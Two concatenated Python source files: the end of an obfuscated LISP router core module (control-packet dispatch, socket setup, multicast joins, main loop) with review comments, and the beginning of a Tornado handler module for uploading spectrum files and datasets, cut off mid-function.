            OOoOoO = lisp . lisp_bit_stuff ( OOoOoO )
        else :
            OOoOoO = OOoOoO [ 0 ]
        if 83 - 83: I1IiiI - OoO0O00 - o0oOOo0O0Ooo / O0 - I11i . II111iiii
        if 27 - 27: Ii1I
        if ( III1iII1I1ii != "control-packet" ) :
            lisp . lprint ( ( "lisp_core_control_packet_process() received" + "unexpected control-packet, message ignored" ) )
            if 59 - 59: Ii1I / II111iiii - IiII % OoOoOO00 % OoooooooOO
            continue
        if 79 - 79: iII111i . OoooooooOO . I1IiiI * O0 * OoO0O00 - OOooOOo
        if 33 - 33: I1ii11iIi11i . Oo0Ooo + I1IiiI + o0oOOo0O0Ooo
        lisp . lprint ( ( "{} {} bytes from {}, dest/port: {}/{}, control-" + "packet: {}" ) . format ( lisp . bold ( "Receive" , False ) , len ( OOoOoO ) ,
        # iII111i * I1Ii111 * I11i * iII111i
        oOOo0 , O0o0O0O0O , oo00O00oO , lisp . lisp_format_packet ( OOoOoO ) ) )
        if 57 - 57: OOooOOo % OoO0O00 - I1IiiI
        if 3 - 3: OOooOOo + i1IIi % I1ii11iIi11i
        if 100 - 100: OoooooooOO + i11iIiiIii % o0oOOo0O0Ooo + I1IiiI . Oo0Ooo . II111iiii
        if 93 - 93: II111iiii . i11iIiiIii + II111iiii % oO0o
        if 98 - 98: I1Ii111 * oO0o * OoOoOO00 + Ii1I * iII111i
        if 4 - 4: IiII
        # A Map-Reply whose nonce matches a cached info-source is handed
        # back through the local dispatch path (NAT proxying).
        oO0ooOOO = lisp . lisp_control_header ( )
        oO0ooOOO . decode ( OOoOoO )
        if ( oO0ooOOO . type == lisp . LISP_MAP_REPLY ) :
            ii11Ii1IiiI1 = lisp . lisp_map_reply ( )
            ii11Ii1IiiI1 . decode ( OOoOoO )
            if ( O0Oo0O00o0oo0OO ( None , 0 , ii11Ii1IiiI1 . nonce ) ) :
                OO0o0o0oo ( lisp_sockets , oOOo0 , oo00O00oO , OOoOoO )
                continue
            if 16 - 16: iIii1I11I1II1 * iII111i + oO0o . O0 . o0oOOo0O0Ooo
        if 99 - 99: i11iIiiIii - iII111i
        if 85 - 85: I1Ii111 % I1ii11iIi11i
        if 95 - 95: OoO0O00 * OOooOOo * iII111i . o0oOOo0O0Ooo
        if 73 - 73: OoO0O00
        if 28 - 28: OoooooooOO - I11i
        if 84 - 84: II111iiii
        if 36 - 36: OOooOOo - OoOoOO00 - iIii1I11I1II1
        # A Map-Notify sourced by the local ETR is relayed to the ITR.
        if ( oO0ooOOO . type == lisp . LISP_MAP_NOTIFY and oOOo0 == "lisp-etr" ) :
            O0ooo0O0oo0 = lisp . lisp_packet_ipc ( OOoOoO , oOOo0 , oo00O00oO )
            lisp . lisp_ipc ( O0ooo0O0oo0 , Ooo , "lisp-itr" )
            continue
        if 10 - 10: I1ii11iIi11i / Ii1I * i1IIi % O0 + I11i
        if 25 - 25: I1Ii111 - Ii1I / O0 . OoooooooOO % I1IiiI . i1IIi
        if 19 - 19: II111iiii / II111iiii % I1ii11iIi11i + oO0o + oO0o + iII111i
        if 4 - 4: o0oOOo0O0Ooo + I11i / iII111i + i1IIi % o0oOOo0O0Ooo % iII111i
        if 80 - 80: Ii1I
        if 26 - 26: iIii1I11I1II1 . OoooooooOO - iIii1I11I1II1
        if 59 - 59: I1ii11iIi11i + I11i . oO0o
        # Otherwise send on the wire.  NOTE(review): the lisp_convert_4to6
        # result on the next line is immediately overwritten — dead store;
        # the IPv4-mapped-IPv6 conversion is redone manually just below.
        IIIIIiI11Ii = lisp . lisp_convert_4to6 ( O0o0O0O0O )
        IIIIIiI11Ii = lisp . lisp_address ( lisp . LISP_AFI_IPV6 , "" , 128 , 0 )
        if ( IIIIIiI11Ii . is_ipv4_string ( O0o0O0O0O ) ) : O0o0O0O0O = "::ffff:" + O0o0O0O0O
        IIIIIiI11Ii . store_address ( O0o0O0O0O )
        if 87 - 87: OoO0O00
        if 34 - 34: I1Ii111 . OoOoOO00 / i11iIiiIii / iII111i
        if 46 - 46: Oo0Ooo + II111iiii * I1IiiI + OOooOOo
        if 31 - 31: Ii1I * o0oOOo0O0Ooo * Ii1I + OoO0O00 * o0oOOo0O0Ooo . I1Ii111
        lisp . lisp_send ( lisp_sockets , IIIIIiI11Ii , oo00O00oO , OOoOoO )
        if 89 - 89: OoooooooOO * Ii1I * I1IiiI . ooOoO0o * Ii1I / iII111i
    return
if 46 - 46: i11iIiiIii
if 15 - 15: O0 / i1IIi / i1IIi . iII111i % OoOoOO00 + I1IiiI
if 48 - 48: I1Ii111 % iII111i % Ii1I % iIii1I11I1II1 . Ii1I
if 14 - 14: iII111i * OoO0O00 % O0 + I11i + I1ii11iIi11i
if 23 - 23: Oo0Ooo % iII111i + Ii1I - I1Ii111
if 65 - 65: OoooooooOO
if 22 - 22: OOooOOo + II111iiii + Oo0Ooo
if 83 - 83: ooOoO0o
def O0O0oOOo0O():
    """Create ./lisp.config from ./lisp.config.example.

    Copies lines from the example file up to and including the first
    full-width separator line of the form "#----...----#", then stops.

    Fix: the original indexed line[0]/line[-1] before checking the length,
    raising IndexError on any empty line; the length guard now comes first.
    """
    with open("./lisp.config.example", "r") as example:
        lines = example.read().split("\n")

    with open("./lisp.config", "w") as config:
        for line in lines:
            config.write(line + "\n")

            #
            # Stop after writing the "#---...---#" separator line.  Guard
            # the length before indexing so empty lines are handled.
            #
            if len(line) >= 4 and line[0] == "#" and line[-1] == "#":
                interior = line[1:-2]
                if interior == len(interior) * "-":
                    break
    return
if 5 - 5: OoOoOO00 . Oo0Ooo
if 89 - 89: I1IiiI / iII111i / OoooooooOO - i11iIiiIii + I1IiiI
if 64 - 64: i11iIiiIii + i1IIi % O0 . I11i
if 64 - 64: ooOoO0o / i1IIi % iII111i
if 84 - 84: OoOoOO00 - Oo0Ooo . ooOoO0o . IiII - Oo0Ooo
if 99 - 99: I1Ii111
if 75 - 75: ooOoO0o . OOooOOo / IiII
if 84 - 84: OoooooooOO . I1IiiI / o0oOOo0O0Ooo
def oOO0O00o0O0 ( bottle_port ) :
    # lisp-core process startup: open the port-4342 control socket, the
    # port-4341 data socket (when no external data-plane exists), the IPC
    # sockets, bootstrap ./lisp.config if missing, and spawn the worker
    # threads.  Returns True on success, False when no local addresses
    # are found.  NOTE: identifiers are machine-obfuscated; the no-op
    # "if N - N:" statements are obfuscator filler, preserved verbatim.
    global o0oO0
    global I1Ii11I1Ii1i
    global Ooo
    global o0oOoO00o
    global i1
    global oOOoo00O0O
    if 68 - 68: i11iIiiIii + OoO0O00
    lisp . lisp_i_am ( "core" )
    lisp . lisp_set_exception ( )
    lisp . lisp_print_banner ( "core-process starting up" )
    lisp . lisp_uptime = lisp . lisp_get_timestamp ( )
    lisp . lisp_version = getoutput ( "cat lisp-version.txt" )
    o0oO0 = getoutput ( "cat lisp-build-date.txt" )
    if 13 - 13: ooOoO0o - I1IiiI
    if 23 - 23: I1IiiI
    if 7 - 7: iII111i % I1ii11iIi11i
    if 64 - 64: I1Ii111 + i11iIiiIii
    # Abort startup when no usable local addresses can be discovered.
    if ( lisp . lisp_get_local_addresses ( ) == False ) : return ( False )
    if 35 - 35: OoOoOO00 + i1IIi % OOooOOo
    if 68 - 68: IiII . ooOoO0o
    if 64 - 64: i1IIi + Oo0Ooo * I1IiiI / OOooOOo
    if 3 - 3: Oo0Ooo / ooOoO0o + ooOoO0o . I1ii11iIi11i
    if 50 - 50: iIii1I11I1II1 * oO0o
    # Lock serializing IPC access for this process's threads.
    lisp . lisp_ipc_lock = multiprocessing . Lock ( )
    if 85 - 85: i1IIi
    if 100 - 100: OoooooooOO / I11i % OoO0O00 + Ii1I
    if 42 - 42: Oo0Ooo / IiII . Ii1I * I1IiiI
    if 54 - 54: OoOoOO00 * iII111i + OoO0O00
    if 93 - 93: o0oOOo0O0Ooo / I1IiiI
    if 47 - 47: Oo0Ooo * OOooOOo
    if 98 - 98: oO0o - oO0o . ooOoO0o
    # A source checkout (lisp.py present) is marked with a "+" suffix.
    if ( os . path . exists ( "lisp.py" ) ) : lisp . lisp_version += "+"
    if 60 - 60: I1IiiI * I1ii11iIi11i / O0 + I11i + IiII
    if 66 - 66: IiII * Oo0Ooo . OoooooooOO * I1Ii111
    if 93 - 93: IiII / i1IIi
    if 47 - 47: ooOoO0o - Ii1I
    if 98 - 98: oO0o . I1Ii111 / OoOoOO00 . ooOoO0o
    if 1 - 1: OOooOOo
    # Bind the 4342 control socket to the wildcard address (IPv4-only
    # wildcard on Raspbian), or to the first local RLOC when the
    # LISP_ANYCAST_MR environment variable is set.
    OoOo0o0OOoO0 = "0.0.0.0" if lisp . lisp_is_raspbian ( ) else "0::0"
    if ( os . getenv ( "LISP_ANYCAST_MR" ) == None or lisp . lisp_myrlocs [ 0 ] == None ) :
        I1Ii11I1Ii1i = lisp . lisp_open_listen_socket ( OoOo0o0OOoO0 ,
            str ( lisp . LISP_CTRL_PORT ) )
    else :
        OoOo0o0OOoO0 = lisp . lisp_myrlocs [ 0 ] . print_address_no_iid ( )
        I1Ii11I1Ii1i = lisp . lisp_open_listen_socket ( OoOo0o0OOoO0 ,
            str ( lisp . LISP_CTRL_PORT ) )
    if 30 - 30: Ii1I % I11i + o0oOOo0O0Ooo
    lisp . lprint ( "Listen on {}, port 4342" . format ( OoOo0o0OOoO0 ) )
    if 65 - 65: iIii1I11I1II1 . iII111i / Ii1I
    if 12 - 12: I1IiiI + I1Ii111
    if 80 - 80: oO0o . O0
    if 90 - 90: II111iiii / OoO0O00 / Ii1I
    if 70 - 70: Ii1I - II111iiii . Oo0Ooo / Oo0Ooo
    if 30 - 30: oO0o . OoO0O00 + I11i / iIii1I11I1II1 % Oo0Ooo / oO0o
    # Only open the 4341 data socket when no external data-plane handles it.
    if ( lisp . lisp_external_data_plane ( ) == False ) :
        oOOoo00O0O = lisp . lisp_open_listen_socket ( OoOo0o0OOoO0 ,
            str ( lisp . LISP_DATA_PORT ) )
        lisp . lprint ( "Listen on {}, port 4341" . format ( OoOo0o0OOoO0 ) )
    if 3 - 3: I1ii11iIi11i / II111iiii
    if 73 - 73: OoO0O00 * OoooooooOO - OoooooooOO + I1IiiI * Oo0Ooo
    if 87 - 87: o0oOOo0O0Ooo / IiII / i11iIiiIii
    if 95 - 95: i1IIi / Ii1I / Ii1I
    if 65 - 65: I1Ii111 + iII111i * iII111i
    if 79 - 79: i1IIi / Oo0Ooo - I1IiiI . O0
    # IPC send socket, with a short timeout so sends cannot hang startup.
    Ooo = lisp . lisp_open_send_socket ( "lisp-core" , "" )
    Ooo . settimeout ( 3 )
    if 56 - 56: IiII % O0 * i1IIi - II111iiii
    if 74 - 74: i1IIi - OoOoOO00 % oO0o . O0 - OoooooooOO
    if 84 - 84: I1Ii111
    if 53 - 53: i1IIi
    if 59 - 59: o0oOOo0O0Ooo + I1IiiI % OoooooooOO - iIii1I11I1II1
    # IPC listen socket for packets punted from the data-plane.
    o0oOoO00o = lisp . lisp_open_listen_socket ( "" , "lisp-core-pkt" )
    if 9 - 9: i1IIi - OoOoOO00
    # Socket list handed to the packet-dispatch path (control socket is
    # deliberately listed twice: one slot per address family).
    i1 = [ I1Ii11I1Ii1i , I1Ii11I1Ii1i ,
        Ooo ]
    if 57 - 57: iIii1I11I1II1 * Ii1I * iII111i / oO0o
    if 46 - 46: Ii1I
    if 61 - 61: o0oOOo0O0Ooo / ooOoO0o - II111iiii
    if 87 - 87: I1ii11iIi11i / I1IiiI
    if 45 - 45: OoOoOO00 * ooOoO0o / OoooooooOO + OoO0O00 . I1Ii111 / OoO0O00
    # Worker thread draining punted packets from the IPC listen socket.
    threading . Thread ( target = o0OoOo0O00 ,
        args = [ o0oOoO00o , i1 ] ) . start ( )
    if 64 - 64: Ii1I / i1IIi % I1IiiI - o0oOOo0O0Ooo
    if 11 - 11: I1ii11iIi11i - OoooooooOO
    if 16 - 16: IiII % OoooooooOO - ooOoO0o * Ii1I - Ii1I
    if 27 - 27: IiII + iIii1I11I1II1 / Oo0Ooo + OoO0O00 % Oo0Ooo + OoO0O00
    if 77 - 77: Oo0Ooo * ooOoO0o % Ii1I
    if 2 - 2: I11i / Oo0Ooo / Ii1I / I1ii11iIi11i / OoooooooOO
    # First run on a box: create lisp.config from the shipped example.
    if ( os . path . exists ( "./lisp.config" ) == False ) :
        lisp . lprint ( ( "./lisp.config does not exist, creating a copy " + "from lisp.config.example" ) )
        if 22 - 22: iIii1I11I1II1 * I1IiiI / I11i + OoOoOO00
        O0O0oOOo0O ( )
    if 98 - 98: OOooOOo
    if 69 - 69: II111iiii + Oo0Ooo - oO0o . Oo0Ooo / iIii1I11I1II1 * iIii1I11I1II1
    if 75 - 75: OoO0O00 % OoooooooOO
    if 16 - 16: O0 / i1IIi
    if 58 - 58: o0oOOo0O0Ooo / i11iIiiIii / O0 % I11i % I1IiiI
    if 86 - 86: IiII + OoOoOO00 / I1IiiI + I11i % I11i / i11iIiiIii
    # Join decentralized-push multicast groups (if configured).
    iIiI1I ( I1Ii11I1Ii1i )
    if 2 - 2: o0oOOo0O0Ooo . Ii1I % OoOoOO00
    # Config-file processing thread.
    threading . Thread ( target = lispconfig . lisp_config_process ,
        args = [ Ooo ] ) . start ( )
    if 58 - 58: I1ii11iIi11i % Ii1I * Ii1I - iII111i
    if 9 - 9: ooOoO0o - Ii1I % II111iiii + IiII + OOooOOo % O0
    if 65 - 65: OOooOOo - OoO0O00 % i11iIiiIii
    if 58 - 58: iII111i
    # Web UI (bottle) thread and a periodic worker thread.
    threading . Thread ( target = ooO ,
        args = [ bottle_port ] ) . start ( )
    threading . Thread ( target = oOO0O0O0OO00oo , args = [ ] ) . start ( )
    if 2 - 2: II111iiii + i1IIi
    if 68 - 68: OOooOOo + Ii1I
    if 58 - 58: IiII * Ii1I . i1IIi
    if 19 - 19: oO0o
    # IPC processing thread.
    threading . Thread ( target = IiI1I1IIIi1i ,
        args = [ Ooo ] ) . start ( )
    if 85 - 85: ooOoO0o - I1IiiI / i1IIi / OoO0O00 / II111iiii
    if 94 - 94: iIii1I11I1II1 + IiII
    if 44 - 44: OoO0O00 + I11i % OoO0O00 + i1IIi + iII111i + O0
    if 18 - 18: iIii1I11I1II1 % iIii1I11I1II1 % oO0o + I1IiiI % ooOoO0o / Ii1I
    # Final background worker thread.
    threading . Thread ( target = iI1I1ii11IIi1 ) . start ( )
    return ( True )
if 36 - 36: OoOoOO00 . i11iIiiIii
if 81 - 81: Oo0Ooo * iII111i * OoO0O00
if 85 - 85: O0 * oO0o
if 39 - 39: II111iiii * I1IiiI - iIii1I11I1II1
if 25 - 25: OoooooooOO . Ii1I % iII111i . IiII
if 67 - 67: OoooooooOO + I1Ii111 / ooOoO0o
if 75 - 75: IiII / OoooooooOO . I1IiiI + I1Ii111 - II111iiii
def I1i11 ( ) :
    # Shut down lisp-core: close the IPC send socket, the IPC packet
    # listen socket, and the control/data listen sockets opened at
    # startup.  (Identifiers are machine-obfuscated; the no-op
    # "if N - N:" lines are obfuscator filler, preserved verbatim.)
    if 5 - 5: o0oOOo0O0Ooo - i11iIiiIii . IiII
    if 10 - 10: OoOoOO00 . IiII * iIii1I11I1II1 - oO0o - OoOoOO00 / I1Ii111
    if 13 - 13: oO0o + OoOoOO00 % IiII % OoooooooOO
    if 22 - 22: I1Ii111
    lisp . lisp_close_socket ( Ooo , "lisp-core" )
    lisp . lisp_close_socket ( o0oOoO00o , "lisp-core-pkt" )
    lisp . lisp_close_socket ( I1Ii11I1Ii1i , "" )
    lisp . lisp_close_socket ( oOOoo00O0O , "" )
    return
if 23 - 23: O0
if 41 - 41: i1IIi . OOooOOo / ooOoO0o / o0oOOo0O0Ooo % IiII - Ii1I
if 14 - 14: I1ii11iIi11i - i11iIiiIii * I1Ii111
if 39 - 39: OoooooooOO
if 19 - 19: i11iIiiIii
if 80 - 80: I1IiiI
if 58 - 58: oO0o + I1ii11iIi11i % OoOoOO00
if 22 - 22: iIii1I11I1II1 - Ii1I / I1IiiI * IiII
if 26 - 26: o0oOOo0O0Ooo + OOooOOo - o0oOOo0O0Ooo + Oo0Ooo . oO0o
if 97 - 97: i1IIi
if 46 - 46: I1ii11iIi11i
if 30 - 30: OoO0O00 / O0 * o0oOOo0O0Ooo * I1Ii111 + OoooooooOO * iII111i
def iIiI1I ( lisp_socket ) :
    # If ./lisp.config enables "decentralized-push-xtr", find every
    # map-server whose address is IPv4 multicast (224/4) and join those
    # groups on the given socket via eth0's primary IPv4 address.
    # (Identifiers are machine-obfuscated; the no-op "if N - N:" lines
    # are obfuscator filler, preserved verbatim.)
    if 23 - 23: I11i
    Oo = open ( "./lisp.config" , "r" ) ; O0OOOOo0O = Oo . read ( ) ; Oo . close ( )
    O0OOOOo0O = O0OOOOo0O . split ( "\n" )
    if 36 - 36: IiII . iII111i - i1IIi + I1Ii111
    if 54 - 54: OoooooooOO . oO0o - iII111i
    if 76 - 76: I1Ii111
    if 61 - 61: ooOoO0o / II111iiii * ooOoO0o * OoOoOO00 * I1Ii111 . i11iIiiIii
    if 26 - 26: I1Ii111 / ooOoO0o - OoO0O00 . iIii1I11I1II1
    # Pass 1: is decentralized-push-xtr enabled anywhere in the file?
    O0o0OOo0o0o = False
    for OOoO in O0OOOOo0O :
        # NOTE(review): OOoO[0:1] is a single character and can never
        # equal the two-character "#-", so this early-exit on the footer
        # divider appears to be dead -- presumably meant OOoO[0:2].
        if ( OOoO [ 0 : 1 ] == "#-" and OOoO [ - 2 : - 1 ] == "-#" ) : break
        if ( OOoO == "" or OOoO [ 0 ] == "#" ) : continue
        if ( OOoO . find ( "decentralized-push-xtr = yes" ) == - 1 ) : continue
        O0o0OOo0o0o = True
        break
    if 90 - 90: I11i
    if ( O0o0OOo0o0o == False ) : return
    if 95 - 95: OoO0O00
    if 68 - 68: iIii1I11I1II1 . iIii1I11I1II1 / OoOoOO00 - II111iiii - iIii1I11I1II1
    if 75 - 75: ooOoO0o . I1IiiI * II111iiii
    if 99 - 99: iIii1I11I1II1 * I1ii11iIi11i + IiII
    if 70 - 70: i1IIi % ooOoO0o . I1ii11iIi11i - IiII + OOooOOo
    # Pass 2: collect multicast map-server addresses (first octet 224-239)
    # from "address = ..." lines inside "lisp map-server" clauses.
    OO0o0oo = [ ]
    o0oo0oOOOo00 = False
    for OOoO in O0OOOOo0O :
        if ( OOoO [ 0 : 1 ] == "#-" and OOoO [ - 2 : - 1 ] == "-#" ) : break
        if ( OOoO == "" or OOoO [ 0 ] == "#" ) : continue
        if 57 - 57: o0oOOo0O0Ooo + Oo0Ooo * I1ii11iIi11i - ooOoO0o % iIii1I11I1II1 - Ii1I
        if ( OOoO . find ( "lisp map-server" ) != - 1 ) :
            o0oo0oOOOo00 = True
            continue
        if 37 - 37: OoO0O00 * I11i + Ii1I + I1ii11iIi11i * o0oOOo0O0Ooo
        if ( OOoO [ 0 ] == "}" ) :
            o0oo0oOOOo00 = False
            continue
        if 95 - 95: Ii1I - i11iIiiIii % i11iIiiIii - O0 * I1Ii111
        if 81 - 81: II111iiii * I1IiiI % i1IIi * i11iIiiIii + OoOoOO00
        if 100 - 100: i1IIi % Ii1I
        if 55 - 55: I1IiiI + iII111i
        if 85 - 85: oO0o + iII111i % iII111i / I11i . I1IiiI - OoOoOO00
        if ( o0oo0oOOOo00 and OOoO . find ( "address = " ) != - 1 ) :
            i1I11 = OOoO . split ( "address = " ) [ 1 ]
            OoO00 = int ( i1I11 . split ( "." ) [ 0 ] )
            if ( OoO00 >= 224 and OoO00 < 240 ) : OO0o0oo . append ( i1I11 )
    if 57 - 57: Oo0Ooo - OoooooooOO % I1ii11iIi11i . OoO0O00 * II111iiii
    if 72 - 72: I1Ii111 + ooOoO0o . IiII % II111iiii
    # NOTE(review): this compares the last address STRING to [], which is
    # never true, and raises NameError when no address line was seen --
    # presumably the empty-list check was meant for the collected list.
    if ( i1I11 == [ ] ) : return
    if 58 - 58: ooOoO0o
    if 45 - 45: o0oOOo0O0Ooo
    if 67 - 67: iII111i + ooOoO0o
    if 25 - 25: i1IIi - i11iIiiIii
    # Resolve eth0's IPv4 address to use as the multicast interface.
    Ii1IIi = getoutput ( 'ifconfig eth0 | egrep "inet "' )
    if ( Ii1IIi == "" ) : return
    i1IIII1II = Ii1IIi . split ( ) [ 1 ]
    if 89 - 89: I11i % iII111i * Oo0Ooo / I1Ii111 * Oo0Ooo / ooOoO0o
    if 14 - 14: i1IIi * iIii1I11I1II1 - Ii1I * OoOoOO00 - iII111i / oO0o
    if 73 - 73: I1ii11iIi11i - OoOoOO00 * O0 - OoOoOO00 - OoO0O00
    if 96 - 96: I1ii11iIi11i - O0
    # Join each collected group on the control socket.
    Ii111iIi1iIi = socket . inet_aton ( i1IIII1II )
    for i1I11 in OO0o0oo :
        lisp_socket . setsockopt ( socket . SOL_SOCKET , socket . SO_REUSEADDR , 1 )
        lisp_socket . setsockopt ( socket . IPPROTO_IP , socket . IP_MULTICAST_IF , Ii111iIi1iIi )
        I1iO00O000oOO0oO = socket . inet_aton ( i1I11 ) + Ii111iIi1iIi
        lisp_socket . setsockopt ( socket . IPPROTO_IP , socket . IP_ADD_MEMBERSHIP , I1iO00O000oOO0oO )
        lisp . lprint ( "Setting multicast listen socket for group {}" . format ( i1I11 ) )
    if 88 - 88: o0oOOo0O0Ooo . I1IiiI % oO0o . Oo0Ooo % ooOoO0o . oO0o
    if 53 - 53: i1IIi % Ii1I - OoooooooOO / OoOoOO00 - iIii1I11I1II1
    return
if 9 - 9: I1Ii111 - OoO0O00 + iIii1I11I1II1 % O0 + I11i + IiII
if 50 - 50: i1IIi + ooOoO0o
if 64 - 64: o0oOOo0O0Ooo % oO0o . ooOoO0o
if 6 - 6: ooOoO0o / i11iIiiIii - Oo0Ooo
# ---- lisp-core module entry point (machine-obfuscated) ----
# Optional argv[1] selects the bottle web-UI port; default 8080.
I11iIiiI = int ( sys . argv [ 1 ] ) if ( len ( sys . argv ) > 1 ) else 8080
if 88 - 88: I1ii11iIi11i - I11i * OoooooooOO * iII111i . i11iIiiIii . o0oOOo0O0Ooo
if 96 - 96: I1IiiI % I1IiiI / o0oOOo0O0Ooo / OoOoOO00 * ooOoO0o - I1Ii111
if 94 - 94: Oo0Ooo - iIii1I11I1II1 + I1IiiI - i1IIi + OoooooooOO % OoO0O00
if 36 - 36: iII111i * I11i * O0 * OOooOOo - o0oOOo0O0Ooo / I1ii11iIi11i
# Run startup; bail out with a non-zero exit code when it fails.
if ( oOO0O00o0O0 ( I11iIiiI ) == False ) :
    lisp . lprint ( "lisp_core_startup() failed" )
    lisp . lisp_print_banner ( "lisp-core abnormal exit" )
    exit ( 1 )
if 54 - 54: i1IIi - OoO0O00 / OoooooooOO
if 95 - 95: O0 + iIii1I11I1II1 . I1ii11iIi11i
# Main loop: receive control-plane messages on the 4342 socket and
# dispatch them.  An empty source address means the socket was closed,
# which triggers a clean shutdown.
while ( True ) :
    if 61 - 61: Ii1I * Ii1I
    if 70 - 70: I1Ii111 . I1ii11iIi11i / o0oOOo0O0Ooo * oO0o
    if 74 - 74: I1IiiI . ooOoO0o / iII111i . IiII
    if 74 - 74: Oo0Ooo / I1Ii111 % I1Ii111 . IiII
    if 72 - 72: i1IIi
    III1iII1I1ii , oOOo0 , oo00O00oO , OOoOoO = lisp . lisp_receive ( I1Ii11I1Ii1i , False )
    if 21 - 21: I1Ii111 . OOooOOo / i11iIiiIii * i1IIi
    if ( oOOo0 == "" ) : break
    if 82 - 82: ooOoO0o * Oo0Ooo % i11iIiiIii * i1IIi . OOooOOo
    if 89 - 89: IiII - i1IIi - IiII
    if 74 - 74: OoO0O00 % OoO0O00
    if 28 - 28: OoOoOO00 % oO0o - OOooOOo + OOooOOo + oO0o / iIii1I11I1II1
    # Normalize an IPv4-mapped IPv6 source back to IPv4, then dispatch.
    oOOo0 = lisp . lisp_convert_6to4 ( oOOo0 )
    OO0o0o0oo ( i1 , oOOo0 , oo00O00oO , OOoOoO )
    if 91 - 91: I1IiiI / II111iiii * OOooOOo
    if 94 - 94: II111iiii - iIii1I11I1II1 - iIii1I11I1II1
# Close all sockets and exit cleanly.
I1i11 ( )
lisp . lisp_print_banner ( "lisp-core normal exit" )
exit ( 0 )
if 83 - 83: I1ii11iIi11i * iIii1I11I1II1 + OoOoOO00 * i1IIi . OoooooooOO % Ii1I
if 81 - 81: OoO0O00 - iIii1I11I1II1
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
upload.py | from __future__ import absolute_import, print_function, division
import h5py
import logging
import numpy as np
import os
import pandas as pd
import re
import time
import yaml
from io import BytesIO, StringIO
from six.moves import xrange
from superman.file_io import parse_spectrum
from threading import Thread
from tornado import gen
from tornado.escape import url_escape
from zipfile import is_zipfile, ZipFile
from .common import BaseHandler
from ..web_datasets import (
UploadedSpectrumDataset,
WebTrajDataset, WebVectorDataset, WebLIBSDataset, DATASETS,
PrimaryKeyMetadata, NumericMetadata, BooleanMetadata, LookupMetadata)
from six.moves import map
from six.moves import range
# This hack is required to work around a strange bug in superman.file_io
# where pandas.read_excel will call .close() on the file object, even if
# parsing as an excel file fails.
class UncloseableBytesIO(BytesIO):
    """A BytesIO whose close() is a deliberate no-op.

    Works around a bug in superman.file_io where pandas.read_excel calls
    .close() on the file object even when excel parsing fails; keeping
    the buffer open lets us retry with a different parser.
    """

    def close(self):
        # Ignore close requests entirely; the buffer stays readable.
        return None
class SpectrumUploadHandler(BaseHandler):
    """Handles single-spectrum uploads for the explorer view."""

    def post(self):
        """Parse an uploaded spectrum file and plot it.

        Responds with the plot's axis limits as JSON on success, or a
        visible error (403 for bad requests, 415 for unparseable data).
        """
        fig_data = self.get_fig_data()
        if fig_data is None:
            return self.visible_error(403, 'Broken connection to server.')
        if not self.request.files:
            return self.visible_error(403, 'No file uploaded.')
        f = self.request.files['query'][0]
        fname = f['filename']
        logging.info('Parsing file: %s', fname)
        fh = UncloseableBytesIO(f['body'])
        try:
            query = parse_spectrum(fh)
        except Exception:
            try:
                # Retry as text: some spectrum formats only parse from str.
                fh = StringIO(f['body'].decode(
                    'utf-8', 'ignore'), newline=None)
                query = parse_spectrum(fh)
            except Exception:
                logging.exception('Spectrum parse failed.')
                # XXX: save failed uploads for debugging purposes
                # Bug fix: f['body'] is bytes, so the file must be opened
                # in binary mode (text mode raised TypeError), and the
                # handle is now closed via a context manager.
                with open('logs/badupload-' + fname, 'wb') as badf:
                    badf.write(f['body'])
                return self.visible_error(415, 'Spectrum upload failed.')
        ds = UploadedSpectrumDataset(fname, query)
        fig_data.set_selected(ds.view(), title=fname)
        axlimits = fig_data.plot()
        return self.write_json(axlimits)
class DatasetUploadHandler(BaseHandler):
    """Handles whole-dataset uploads (spectra file + optional metadata CSV)."""

    @gen.coroutine
    def post(self):
        """Validate the request and kick off the async dataset import.

        On success, writes a link to the new dataset's explorer page and
        starts a background thread that persists the dataset to disk.
        """
        ds_name = self.get_argument('ds_name')
        ds_kind = self.get_argument('ds_kind')
        description = self.get_argument('desc')
        # Optional resample (lower bound, upper bound, step); all-empty
        # means "keep the original wavelength axis".
        resample = (self.get_argument('lb', ''), self.get_argument('ub', ''),
                    self.get_argument('step', ''))
        if not any(resample):
            resample = None
        if ds_kind not in DATASETS:
            self.visible_error(
                400,
                'Invalid dataset kind.',
                'Invalid ds_kind: %r',
                ds_kind)
            return
        # Refuse to overwrite an existing dataset of the same kind/name.
        if ds_name in DATASETS[ds_kind]:
            self.visible_error(403, 'Dataset already exists.',
                               'ds import would clobber existing: %s [%s]',
                               ds_name, ds_kind)
            return
        if not self.request.files or 'spectra' not in self.request.files:
            self.visible_error(400, 'No spectrum data uploaded.')
            return
        # Metadata is optional; fall back to None when absent.
        meta_file, = self.request.files.get('metadata', [None])
        spectra_file, = self.request.files['spectra']
        # Parse on a worker thread; err is None or a visible_error tuple.
        err = yield gen.Task(_async_ds_upload, meta_file, spectra_file, ds_name,
                             ds_kind, resample, description)
        if err:
            self.visible_error(*err)
            return
        # Return a link to the new dataset to signal the upload succeeded.
        self.write('/explorer?ds_kind=%s&ds_name=%s' % (
            ds_kind, url_escape(ds_name, plus=False)))
        # Kick off a background thread to save this new dataset to disk.
        t = Thread(target=_save_ds, args=(ds_kind, ds_name))
        t.daemon = True
        t.start()
def _async_ds_upload(meta_file, spectra_file, ds_name, ds_kind, resample,
                     description, callback=None):
    """Parse and register an uploaded dataset on a daemon thread.

    ZIP uploads are treated as one spectrum file per entry; anything
    else is treated as a single CSV of spectra. When parsing finishes,
    `callback` is invoked with None on success or an error tuple.
    """
    def worker():
        meta_kwargs, meta_pkeys, err = _load_metadata_csv(meta_file)
        if err is None:
            buf = BytesIO(spectra_file['body'])
            zipped = is_zipfile(buf)
            buf.seek(0)
            if zipped:
                # interpret this as a ZIP of csv files
                err = _traj_ds(buf, ds_name, ds_kind, meta_kwargs, meta_pkeys,
                               resample, description)
            else:
                # this is one single csv file with all spectra in it
                err = _vector_ds(buf, ds_name, ds_kind, meta_kwargs, meta_pkeys,
                                 resample, description)
        callback(err)

    worker_thread = Thread(target=worker)
    worker_thread.daemon = True
    worker_thread.start()
def _load_metadata_csv(f=None):
# metadata is optional
if f is None:
return {}, [], None
fh = BytesIO(f['body'])
try:
meta = pd.read_csv(fh)
except Exception:
logging.exception('Bad metadata file')
return None, None, (415, 'Unable to parse metadata CSV.')
if meta.columns[0] != 'pkey':
return None, None, (415, 'Metadata CSV must start with "pkey" column.')
meta_kwargs = {}
for i, name in enumerate(meta.columns[1:]):
x = meta[name].values
if np.issubdtype(x.dtype, np.bool_):
m = BooleanMetadata(x, display_name=name)
elif np.issubdtype(x.dtype, np.number):
m = NumericMetadata(x, display_name=name)
else:
m = LookupMetadata(x, display_name=name)
# use a JS-friendly string key
